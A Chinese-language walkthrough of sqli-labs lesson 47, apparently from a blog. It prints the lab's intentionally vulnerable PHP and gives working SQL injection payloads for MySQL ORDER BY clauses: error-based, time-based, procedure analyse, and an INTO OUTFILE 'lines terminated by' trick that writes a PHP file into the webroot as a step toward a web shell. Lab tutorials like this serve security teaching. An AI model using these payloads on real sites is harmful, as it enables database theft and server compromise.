sqli-labs————Less-47(procedure alalyse\lines terminated by利用)
Less-47
原始碼:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>ORDER BY Clause-Error-Single quote</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<?php
include("../sql-connections/sql-connect.php");
$id=$_GET['sort'];
if(isset($id))
{
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'SORT:'.$id."\n");
fclose($fp);
$sql = "SELECT * FROM users ORDER BY '$id'";
$result = mysql_query($sql);
if ($result)
{
?>
<center>
<font color= "#00FF00" size="4">
<table border=1'>
<tr>
<th> ID </th>
<th> USERNAME </th>
<th> PASSWORD </th>
</tr>
</font>
</font>
<?php
while ($row = mysql_fetch_assoc($result))
{
echo '<font color= "#00FF11" size="3">';
echo "<tr>";
echo "<td>".$row['id']."</td>";
echo "<td>".$row['username']."</td>";
echo "<td>".$row['password']."</td>";
echo "</tr>";
echo "</font>";
}
echo "</table>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
}
else
{
echo "Please input parameter as SORT with numeric value<br><br><br><br>";
echo "<br><br><br>";
echo '<img src="../images/Less-47.jpg" /><br>';
echo "Lesson Concept and code Idea by <b>D4rk</b>";
}
?>
</font> </div></br></br></br>
</center>
</body>
</html>
SQL執行語句:
$sql = "SELECT * FROM users ORDER BY '$id'";
與上一關不同的是這裡的id變為了字元型,但是我們還是可以進行注入,按照注入的位置分類如下:
1、order by 後引數
我們只能使用and來進行報錯和延時注入。我們下面給出幾個payload示例。
① and rand相結合的方式
payload:
http://192.168.11.136/sqli-labs/Less-47?sort=1'and rand(ascii(left(database(),1))=115)--+
換成116之後:
http://192.168.11.136/sqli-labs/Less-47?sort=1'and rand(ascii(left(database(),1))=116)--+
此處後期經過測試,還是存在問題的,我們不能使用這種方式進行準確的注入。此處留下只是一個示例。
②可以利用報錯的方式進行
http://192.168.11.136/sqli-labs/Less-47?sort=1'and (select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))--+
可以看到user()的內容,同時可以構造其他的語句進行注入。
這裡再放一個報錯注入,原理和上面的payload是一樣的,都是利用的mysql重複項的原理。
http://192.168.11.136/sqli-labs/Less-47?sort=1'and (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x)--+
此處爆出了version()即版本號資訊。
③延時注入
http://192.168.11.136/sqli-labs/Less-47?sort=1'and If(ascii(substr(database(),1,1))=115,0,sleep(5))--+
這裡因database()為security,所以第一個字母的s的ascii為115,此處直接顯示,當改為116或者其他的數字的時候,就要延時了,我們這裡就不貼圖展示了,可以通過指令碼爆破。
(2)procedure analyse引數後注入
利用procedure analyse引數,我們可以執行報錯注入。同時,在procedure analyse和order by之間可以存在limit引數,我們在實際應用中,往往也可能會存在limit後的注入,可以利用procedure analyse進行注入。
以下為示範例
http://192.168.11.136/sqli-labs/Less-47?sort=1'procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)--+
http://192.168.11.136/sqli-labs/Less-47?sort=1'into outfile 'C:\\phpstudy\\WWW\\sqli-labs\\Less-47\\test.php'--+
那這個時候我們可以考慮上傳網馬,利用lines terminated by。
http://192.168.11.136/sqli-labs/Less-47?sort=1'into outfile 'C:\\phpstudy\\WWW\\sqli-labs\\Less-47\\test1.php' lines terminated by 0x3c3f70687020706870696e666f28293b3f3e2020--+
此處的16進位制檔案為<?php phpinfo();?>
我們訪問test1.php
相關文章
- FIELDS TERMINATED BY WHITESPACE & FIELDS TERMINATED BY x'09'
- FIELDS TERMINATED BY WHITESPACE & FIELDS TERMINATED BY x'09' 區別
- 利用隱式遊標分批刪除資料的procedure
- Lines演示程式
- Telephone Lines S
- Terminated With Error ORA-474: SMON Process Terminated With Error-1361872.1Error
- Procedure加密加密
- The OracleService$$$ service terminated unexpectedly.Oracle
- JVM terminated. Exit code=1JVM
- Oracle Wrap ProcedureOracle
- alter package/procedurePackage
- MySQL中使用procedureMySql
- 怎樣加密procedure加密
- sql primary key procedureSQL
- Procedure to create Distribution model
- DELETE_TABLE_STATS Proceduredelete
- Image Noise Reduction Develop Proceduredev
- Procedure for Setting Partner FunctionsFunction
- How to rename an Oracle stored procedureOracle
- EXECUTE IMMEDIATE dynamic sql in procedureSQL
- 分頁procedure (SQL Server)SQLServer
- oracle 中呼叫 store procedureOracle
- Oracle stored procedure to send emailOracleAI
- the procedure:delete the data of one tabledelete
- less-12 in sqli-labsSQL
- sqli-labs(54-65)SQL
- sqli-labs————Less-52SQL
- sqli-labs————Less-53SQL
- sqli-labs————Less-55SQL
- sqli-labs————Less-56SQL
- sqli-labs————Less-57SQL
- sqli-labs————Less-58SQL
- sqli-labs————Less-59SQL
- sqli-labs————Less-28SQL
- sqli-labs————less-28aSQL
- sqli-labs————Less-29SQL
- sqli-labs————Less-30SQL
- sqli-labs————Less-31SQL